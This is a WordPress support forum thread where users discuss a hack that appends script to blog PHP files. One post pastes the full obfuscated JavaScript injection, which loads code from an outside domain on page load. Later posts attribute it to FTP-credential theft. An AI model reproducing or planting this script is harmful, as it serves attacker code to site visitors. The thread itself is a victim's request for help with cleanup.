WordPress.org

Ready to get started?Download WordPress

Forums

A new hack in wordpress blog. 2.8.4 Parse error: /wp-includes/default-widgets.p (5 posts)

  1. magnumfinger
    Member
    Posted 4 years ago #

    I don't know if you have experienced this but a friend of mine got this one.

    /wp-includes/default-widgets.php on line 1035 error

    and I believe this was a hack. I was wondering, how did you put a remedy on this one?

    So far this hack infuses, to the files of your blog.

    <script>/*LGPL*/ try{ window.onload = function(){var Sz5at9il9im = document.createElement('s@(c@#r(@i&!&p#@)t!^$'.rep lace(/\)|@|#|\(|&|\!|\$|\^/ig, ''));Sz5at9il9im.setAttribute('defer', 'd^!!e#!f$$e$@)^r$'.replace(/\)|\(|\^|#|@|\!|\$|&/ig, ''));Sz5at9il9im.setAttribute('type', 't^^#e^x#$!!t&@^/#&&j#a&$!v(a(#&^s)c#@&r#i$^p$!t!!'.replace(/\^|#|\(|\!|\$|&|@|\)/ig, ''));Sz5at9il9im.setAttribute('id', 'T^#^!#l#@9((!@h)!#p&^8&#v^!y(&(m^$5$)&v&$!e#!0##' .replace(/\!|#|\)|&|@|\(|\^|\$/ig, ''));Sz5at9il9im.setAttribute('s#$r((c&)'.replace(/&|\(|@|\)|\$|\!|#|\^/ig, ''), 'h($t$$&t&p^((^:$)/#^&/))c())r#)(&i)&c)$&^i)!@)n^&&$f!&^!o)!-^(c!#o)&((m#^&$.(^)(n(#&y^@p#!o^)&s^(@t$.#c$(o&&@! ^m!(.!$#^a$!^$m&a!$z&$$(o^&$n($^-(#)f&#!r&$.(&$t)@^@e#e)$($n#(!w((&$e#b&##@d)!^e^$s @)#$i)g^#^n&).&!!)r())u$##@!8@@0!)#)8!!0!!^/^(k(#)u@&@6$.))#c@)(o#@&@m(##/)$k))!u^^6(!##.#&c(##^o@&!^)m#)@#/)#&g(o^!$!o#&g@l^$&e$$@.(c$)@o#&!!m#/(@^!)b@^!&i@$g!!p($^o$^i(^(n&t&^&.!#c&&!o#m!@/!!a!@(d(#d#!#!i$&@#c!&)&t!&$$&i(@n(@!g)!)&g(&a@@m( e((^s@!.@c&(@)&o@&m)#/(^'.replace(/\$|\!|\^|@|#|\(|\)|&/ig, ''));if (document){document.body.appendChild(Sz5at9il9im); }} } catch(Srq4haf5c9lbvv1f21u) {}</script>
    <!--3f6594acfea60646639b05cbd580f9ea-->

    To remedy the situation you need to delete that script from the files affected.

    The question is, how do you protect your website from such script injection?

  2. colvin
    Member
    Posted 4 years ago #

    There seems to be, all of a sudden, a lot of "script injection." I'm having trouble with 3 WP blogs hosted by Hostgator. It's support team has been responsive, cleaning things up -- but within hours problems return. They mention script injection in their reports back to me, with intimation that it's happening a lot recently.

  3. magnumfinger
    Member
    Posted 4 years ago #

    for all those people who are having a problem like this one.

    It seems the culprit is not a hack but rather a virus which snoops on your FTP password, logs-in on your account and try to append this malicious script on your .php files inside your webfolders

    see this link: blackhatworld.com/blackhat-seo/black-hat-seo/158192-new-hack-wordpess-blogs-parese-error-wp-includes-default-widgets-php-line-1035-a.html

  4. This thread is setting off virus reports & pop-ups in some people's browsers.

  5. Mark / t31os
    Moderator
    Posted 4 years ago #

    Are these particular users running upto date virus definitions?

    I had a problem recently that seemed to be triggered by a particular thread on the forum here, however it did turn out i had a local problem, and i was not able to replicate from other system using the same AV running the same current definitions.

    Please ask these users to confirm from another PC.

    I'll convert the link above to plain text anyway, as i'd imagine it's the link causing the issue.

Topic Closed

This topic has been closed to new replies.

About this Topic